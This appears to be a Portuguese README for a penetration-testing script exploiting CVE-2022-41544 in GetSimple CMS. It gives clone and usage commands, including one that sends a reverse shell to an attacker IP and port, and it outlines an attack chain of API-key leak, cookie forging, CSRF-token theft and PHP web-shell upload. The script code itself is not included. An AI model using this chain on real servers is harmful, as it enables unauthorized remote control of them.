
Script de exploração em Python para CVE-2022-41544 no GetSimple CMS. Automatiza o vazamento de chaves de API, extração de token CSRF, upload de shell PHP e acionamento de reverse shell para testes de penetração.
Este repositório contém um script para explorar a vulnerabilidade CVE-2022-41544 no GetSimple CMS. O script executa várias etapas para verificar vulnerabilidades, vazar chaves de API, definir cookies, obter tokens CSRF, fazer upload de um shell e acionar o shell.
telnetlib, pois não era necessário para a funcionalidade do script.Clone o Repositório:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
Instale as Dependências: Certifique-se de ter Python 3 instalado junto com a biblioteca .
requestspip3 install requests
Execute o Script:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: O domínio ou endereço IP alvo.<path>: O caminho para a instalação do GetSimple CMS.<ip:port>: O IP e a porta para o shell reverso.<username>: O nome do administrador do GetSimple CMS.Exemplo:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): Exibe um banner estilizado usando arte ASCII.get_version(target, path): Verifica se a versão alvo do GetSimple CMS é vulnerável.api_leak(target, path): Tenta recuperar uma chave de API de um arquivo XML de autorização.set_cookies(username, version, apikey): Define cookies necessários para requisições posteriores com base na chave de API recuperada.get_csrf_token(target, path, headers): Extrai um token CSRF necessário para fazer upload do shell.upload_shell(target, path, headers, nonce, shell_content): Envia um shell PHP para o servidor alvo.shell_trigger(target, path): Aciona o shell enviado para estabelecer uma conexão reversa.A função main() orquestra todo o processo chamando as funções acima em sequência para explorar a vulnerabilidade CVE-2022-41544.
Este script foi desenvolvido por h3x0v3rl0rd.
Este script é fornecido apenas para fins educacionais. O acesso não autorizado a sistemas é ilegal e antiético. Use este script com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.
Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para mais detalhes.